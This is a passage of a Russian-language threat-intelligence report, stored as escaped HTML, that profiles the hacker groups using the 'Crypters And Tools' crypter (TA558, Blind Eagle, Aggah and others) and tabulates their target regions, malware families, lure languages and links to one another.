\u043c\u0438\u0440\u0443<\/p>\n<\/li>\n<li>\n<p>\u041c\u044b \u0441\u043c\u043e\u0433\u043b\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 Crypters And Tools<\/p>\n<\/li>\n<li>\n<p>\u0427\u0430\u0441\u0442\u044c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e\u0442\u043d\u043e\u0441\u044f\u0442\u0441\u044f \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u043a \u0433\u0440\u0443\u043f\u043f\u0430\u043c Blind Ealge \u0438 TA558 \u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0438\u0445 \u0447\u043b\u0435\u043d\u0430\u043c\u0438<\/p>\n<\/li>\n<\/ul>\n<p><a class=\"anchor\" name=\"2\" id=\"2\"><\/a><\/p>\n<h2>2. \u0412\u0432\u0435\u0434\u0435\u043d\u0438\u0435<\/h2>\n<p>\u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0447\u0430\u0441\u0442\u0438 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b\u0438 \u043e \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0435 Crypters And Tools, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0430\u0442\u0430\u043a \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a. \u041e\u0442\u0447\u0435\u0442 \u043a\u043e\u043d\u0446\u0435\u043d\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0441\u044f \u043d\u0430 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u043c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 \u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u0441\u0430\u043c\u043e\u0433\u043e \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430. \u0412 \u044d\u0442\u043e\u0439 \u0447\u0430\u0441\u0442\u0438 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0435\u043c \u043e \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u0445, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0435\u0433\u043e \u0432 \u0430\u0442\u0430\u043a\u0430\u0445, \u0438\u0445 \u0441\u0432\u044f\u0437\u044f\u0445, \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044f\u0445, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u0445 Crypters And Tools, \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0441 \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u044b\u043c\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u043c\u0438.<\/p>\n<p>\u0422\u0430\u043a\u0436\u0435, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u043e, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 Aggah \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0441\u043e\u0432\u0435\u0440\u0448\u0430\u0442\u044c \u0430\u0442\u0430\u043a\u0438, \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e \u0447\u0442\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441\u0447\u0438\u0442\u0430\u044e\u0442 2022 \u043a\u043e\u043d\u0446\u043e\u043c \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u044b.<\/p>\n<p>\u041c\u043d\u043e\u0433\u0438\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441\u0442\u0430\u043b\u043a\u0438\u0432\u0430\u043b\u0438\u0441\u044c \u0441 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c Crypters And Tools, \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u043b\u0438 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430 (\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Ande Loader, \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0430\u044f $codigo, \u0441\u0435\u0442\u0435\u0432\u0430\u044f \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430 \u0438 \u0442\u0430\u043a \u0434\u0430\u043b\u0435\u0435) \u0437\u0430 \u0447\u0442\u043e-\u0442\u043e \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u043e\u0435 \u0438 \u043f\u0440\u0438\u043f\u0438\u0441\u044b\u0432\u0430\u043b\u0438 \u0438\u0445 \u043a \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u044b\u043c \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u043c, \u0447\u0442\u043e \u043c\u044b \u0441\u0447\u0438\u0442\u0430\u0435\u043c \u043e\u0448\u0438\u0431\u043a\u043e\u0439.\u00a0 \u0412 \u043a\u043e\u043d\u0446\u0435 \u0441\u0442\u0430\u0442\u044c\u0438 \u043c\u044b \u043f\u0440\u0438\u043b\u043e\u0436\u0438\u043b\u0438 \u0432\u0441\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u043e\u0442\u0447\u0435\u0442\u044b, \u0433\u0434\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442\u0441\u044f Crypters And Tools \u0438\u043b\u0438 \u0435\u0433\u043e \u0440\u0430\u043d\u043d\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u2013 Codigo-\u043a\u0440\u0438\u043f\u0442\u0435\u0440\u044b.<\/p>\n<p><a class=\"anchor\" name=\"3\" id=\"3\"><\/a><\/p>\n<h2>3. \u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 Crypters And Tools \u0432 \u0430\u0442\u0430\u043a\u0430\u0445<\/h2>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td>\n<p align=\"left\">TA558<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0413\u0440\u0443\u043f\u043f\u0430, \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u0441 \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 2018 \u0433\u043e\u0434\u0430, \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u0430 \u043d\u0430 \u0438\u043d\u0434\u0443\u0441\u0442\u0440\u0438\u044e \u0442\u0443\u0440\u0438\u0437\u043c\u0430 \u0432 \u041b\u0430\u0442\u0438\u043d\u0441\u043a\u043e\u0439 \u0410\u043c\u0435\u0440\u0438\u043a\u0435, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0417\u0430\u043f\u0430\u0434\u043d\u0443\u044e \u0415\u0432\u0440\u043e\u043f\u0443 \u0438 \u0421\u0428\u0410, \u043d\u043e \u043f\u043e\u0437\u0436\u0435 \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u043b\u0430 \u0441\u0432\u043e\u0438 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0435 \u0440\u0435\u0433\u0438\u043e\u043d\u044b. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0444\u0438\u0448\u0438\u043d\u0433, \u0441\u0442\u0435\u0433\u0430\u043d\u043e\u0433\u0440\u0430\u0444\u0438\u044e \u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e, \u0442\u0430\u043a\u043e\u0435 \u043a\u0430\u043a Agent Tesla, FormBook \u0438 Loda RAT<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Blind Eagle\/APT-C-36<\/p>\n<\/td>\n<td>\n<p align=\"left\">C 2018 \u0433\u043e\u0434\u0430 \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u042e\u0436\u043d\u0443\u044e \u0410\u043c\u0435\u0440\u0438\u043a\u0443, \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u041a\u043e\u043b\u0443\u043c\u0431\u0438\u044e, \u0430 \u0442\u0430\u043a\u0436\u0435 \u042d\u043a\u0432\u0430\u0434\u043e\u0440 \u0438 \u0418\u0441\u043f\u0430\u043d\u0438\u044e. \u041f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442 \u0444\u0438\u0448\u0438\u043d\u0433 \u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u0442\u0430\u043a\u043e\u0435 \u043a\u0430\u043a NjRAT, BitRAT, AsyncRAT, \u0444\u043e\u043a\u0443\u0441\u0438\u0440\u0443\u044f\u0441\u044c \u043d\u0430 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0438 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0446\u0435\u043b\u044f\u0445<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Aggah\/Hagga group<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u041f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0430\u043a\u0438\u0441\u0442\u0430\u043d\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 \u0441 2018 \u0433\u043e\u0434\u0430. \u041f\u0440\u043e\u0432\u043e\u0434\u0438\u0442 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u0440\u043e\u0442\u0438\u0432 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0441\u0442\u0440\u0430\u043d, \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0430\u0437\u0438\u0430\u0442\u0441\u043a\u0438\u0435, \u0442\u043e \u0442\u0430\u043a\u0436\u0435 \u0431\u044b\u043b\u0430 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u0430 \u0437\u0430 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u043d\u0430 \u041b\u0430\u0442\u0438\u043d\u0441\u043a\u0443\u044e \u0410\u043c\u0435\u0440\u0438\u043a\u0443. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u041f\u041e, \u0432\u043a\u043b\u044e\u0447\u0430\u044f 3LOSH crypter, RevengeRAT \u0438 AgentTesla<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">PhaseShifters<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0413\u0440\u0443\u043f\u043f\u0430 \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0420\u043e\u0441\u0441\u0438\u0438, \u0411\u0435\u043b\u0430\u0440\u0443\u0441\u0438 \u0438 \u041f\u043e\u043b\u044c\u0448\u0438. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0444\u0438\u0448\u0438\u043d\u0433, \u0441\u0442\u0435\u0433\u0430\u043d\u043e\u0433\u0440\u0430\u0444\u0438\u044e \u0438 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 (GitHub, BitBucket) \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043d\u0430\u0433\u0440\u0443\u0437\u043e\u043a, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u041f\u041e, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 Rhadamanthys<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">UAC-0050<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0413\u0440\u0443\u043f\u043f\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 \u0441 2020 \u0433\u043e\u0434\u0430 \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u0430 \u043d\u0430 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435, \u043f\u043e\u043b\u044c\u0441\u043a\u0438\u0435 \u0438 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 \u0433\u043e\u0441\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b. \u0420\u0430\u0441\u0441\u044b\u043b\u0430\u0435\u0442 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430, \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u044f\u0441\u044c \u043f\u043e\u0434 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u044b, \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u044f \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c Remcos RAT, Quasar RAT \u0438 Remote Utilities<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Phantom Control<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0421 \u0438\u044e\u043b\u044f 2023 \u0433\u043e\u0434\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0441\u0430\u0439\u0442\u044b \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f ScreenConnect, \u0437\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u0441\u043b\u0435\u0434\u0443\u0435\u0442 AsyncRAT. \u0412 \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u043c\u043e\u043c\u0435\u043d\u0442 \u043f\u0435\u0440\u0435\u0448\u043b\u0438 \u043d\u0430 Ande Loader \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 SwaetRAT. \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0441 Blind Eagle<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>\u0422\u0430\u0431\u043b\u0438\u0446\u0430 1. \u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 Crypters And Tools<\/p>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\"><strong>Blind Eagle<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>TA558<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>Aggah<\/strong><\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\"><strong>PhantomControl<\/strong><\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\"><strong>PhaseShifters<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>UAC-0050<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"6\" data-colwidth=\"117,0,0,117,117,0\" width=\"117\">\n<p align=\"center\">\u0413\u0435\u043e\u0433\u0440\u0430\u0444\u0438\u044f \u0430\u0442\u0430\u043a<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\"><strong>\u041b\u0430\u0442\u0438\u043d\u0441\u043a\u0430\u044f \u0410\u043c\u0435\u0440\u0438\u043a\u0430<\/strong>: \u041a\u043e\u043b\u0443\u043c\u0431\u0438\u044f, \u042d\u043a\u0432\u0430\u0434\u043e\u0440, \u0427\u0438\u043b\u0438, \u041f\u0430\u043d\u0430\u043c\u0430, \u0411\u0440\u0430\u0437\u0438\u043b\u0438\u044f<\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>\u041b\u0430\u0442\u0438\u043d\u0441\u043a\u0430\u044f \u0410\u043c\u0435\u0440\u0438\u043a\u0430<\/strong>, \u0421\u0435\u0432\u0435\u0440\u043d\u0430\u044f \u0410\u043c\u0435\u0440\u0438\u043a\u0430, \u0417\u0430\u043f\u0430\u0434\u043d\u0430\u044f \u0415\u0432\u0440\u043e\u043f\u0430<\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>\u041b\u0430\u0442\u0438\u043d\u0441\u043a\u0430\u044f \u0410\u043c\u0435\u0440\u0438\u043a\u0430<\/strong>, \u0421\u0435\u0432\u0435\u0440\u043d\u0430\u044f \u0410\u043c\u0435\u0440\u0438\u043a\u0430, \u0417\u0430\u043f\u0430\u0434\u043d\u0430\u044f \u0415\u0432\u0440\u043e\u043f\u0430, \u0411\u043b\u0438\u0436\u043d\u0438\u0439 \u0412\u043e\u0441\u0442\u043e\u043a, \u0412\u043e\u0441\u0442\u043e\u0447\u043d\u0430\u044f \u0410\u0437\u0438\u044f<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">N\/A<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\"><strong>\u0420\u043e\u0441\u0441\u0438\u044f<\/strong>, <strong>\u0411\u0435\u043b\u0430\u0440\u0443\u0441\u044c<\/strong>, <strong>\u041f\u043e\u043b\u044c\u0448\u0430<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>\u0420\u043e\u0441\u0441\u0438\u044f<\/strong>, <strong>\u0411\u0435\u043b\u0430\u0440\u0443\u0441\u044c, \u041f\u043e\u043b\u044c\u0448\u0430, <\/strong>\u0423\u043a\u0440\u0430\u0438\u043d\u0430, \u041c\u043e\u043b\u0434\u043e\u0432\u0430, \u0441\u0442\u0440\u0430\u043d\u044b \u0411\u0430\u043b\u0442\u0438\u0438<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"6\" data-colwidth=\"117,0,0,117,117,0\" width=\"117\">\n<p align=\"center\">\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0435 \u0412\u041f\u041e<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">Remcos RAT, Async RAT, njRAT, Quasar RAT, BitRAT, LimeRAT\u00a0<\/p>\n<\/td>\n<td>\n<p align=\"left\">Remcos RAT, Async RAT, Xworm, Lokibot, FormBook, Agent Tesla, Revenge RAT\u00a0<\/p>\n<\/td>\n<td>\n<p align=\"left\">Rhadamanthys, XWorm, Agent Tesla, Remcos RAT, Warzone RAT, nanocore RAT, njRAT, AzoRult, Lokibot, Revenge RAT<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">Async RAT, SwaetRAT, ScreenConnect (Remote Access Software)<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">Rhadamanthys, DarkTrack RAT, Meta Stealer<\/p>\n<\/td>\n<td>\n<p align=\"left\">Remcos RAT, Meduza Stealer, Lumma Stealer, Quasar RAT<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"6\" data-colwidth=\"117,0,0,117,117,0\" width=\"117\">\n<p align=\"center\">\u042f\u0437\u044b\u043a \u043f\u0438\u0441\u0435\u043c \u0438 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">\u0418\u0441\u043f\u0430\u043d\u0441\u043a\u0438\u0439, \u043f\u043e\u0440\u0442\u0443-\u0433\u0430\u043b\u044c\u0441\u043a\u0438\u0439<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0418\u0441\u043f\u0430\u043d\u0441\u043a\u0438\u0439, \u0430\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u0438\u0439, \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044f\u0437\u044b\u043a\u0438 \u0430\u0442\u0430\u043a\u0443\u0435\u043c\u044b\u0445 \u0440\u0435\u0433\u0438\u043e\u043d\u043e\u0432\u00a0\u00a0<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0410\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u0438\u0439, \u0438\u0441\u043f\u0430\u043d\u0441\u043a\u0438\u0439, \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044f\u0437\u044b\u043a\u0438 \u0430\u0442\u0430\u043a\u0443\u0435\u043c\u044b\u0445 \u0440\u0435\u0433\u0438\u043e\u043d\u043e\u0432\u00a0\u00a0<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\"> N\/A<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">\u0420\u0443\u0441\u0441\u043a\u0438\u0439\u00a0<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0423\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0439, \u0440\u0443\u0441\u0441\u043a\u0438\u0439, \u0440\u0443\u043c\u044b\u043d\u0441\u043a\u0438\u0439, \u0430\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u0438\u0439<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"6\" data-colwidth=\"117,0,0,117,117,0\" width=\"117\">\n<p align=\"center\">\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0421\u0410\u0422<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">2023-2025<\/p>\n<\/td>\n<td>\n<p align=\"left\"> 2023-2025<\/p>\n<\/td>\n<td>\n<p align=\"left\">2021-2023\u00a0<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\"> 2023<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">2024\u00a0<\/p>\n<\/td>\n<td>\n<p align=\"left\">2024\u00a0<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>\u0422\u0430\u0431\u043b\u0438\u0446\u0430 2. \u0421\u0432\u043e\u0434\u043d\u0430\u044f \u0442\u0430\u0431\u043b\u0438\u0446\u0430 \u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u0445, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 Crypters And Tools<\/p>\n<p>\u0412 \u0434\u0430\u043d\u043d\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u043c\u044b \u0441\u043e\u0441\u0440\u0435\u0434\u043e\u0442\u043e\u0447\u0435\u043d\u044b \u043d\u0430 \u0442\u0440\u0451\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u0445: TA558, Blind Eagle \u0438 Aggah, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043d\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u0445 Crypters And Tools, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0441 \u043d\u0438\u043c\u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u044b. \u0414\u043b\u044f \u043d\u0430\u0433\u043b\u044f\u0434\u043d\u043e\u0441\u0442\u0438 \u043f\u0440\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u043c \u0447\u0430\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0435\u0439 \u043c\u0435\u0436\u0434\u0443 \u044d\u0442\u0438\u043c\u0438 \u0433\u0440\u0443\u043f\u043f\u0430\u043c\u0438 \u0432 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0442\u0430\u0431\u043b\u0438\u0446\u0435:<\/p>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td>\n<p align=\"left\">\n<\/td>\n<td>\n<p align=\"left\"><strong>Aggah<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>Blind Eagle<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\"><strong>TA558<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\">\u2022 \u041f\u0435\u0440\u0438\u043e\u0434\u0438\u0447\u0435\u0441\u043a\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 \u00abcdt\u00bb \u043d\u0430 \u043f\u0440\u043e\u0442\u044f\u0436\u0435\u043d\u0438\u0438 \u0432\u0441\u0435\u0445 \u0430\u0442\u0430\u043a<\/p>\n<p align=\"left\">\u2022 \u0410\u0442\u0430\u043a\u0438 \u043d\u0430 \u043e\u0442\u0435\u043b\u0438 \u0432 2018 \u0433\u043e\u0434\u0443<\/p>\n<p align=\"left\">\u2022 \u0421\u0445\u043e\u0434\u0441\u0442\u0432\u043e \u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0412\u041f\u041e \u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u043e\u0432 (3LOSH, Crypters And Tools)<\/p>\n<p align=\"left\">\u2022 \u041f\u043e\u0445\u043e\u0436\u0438\u0439 \u043a\u043e\u0434 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u0432 2024 \u0433\u043e\u0434\u0443<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u2022 \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043e\u0431\u0449\u0435\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b CryptersAndTools 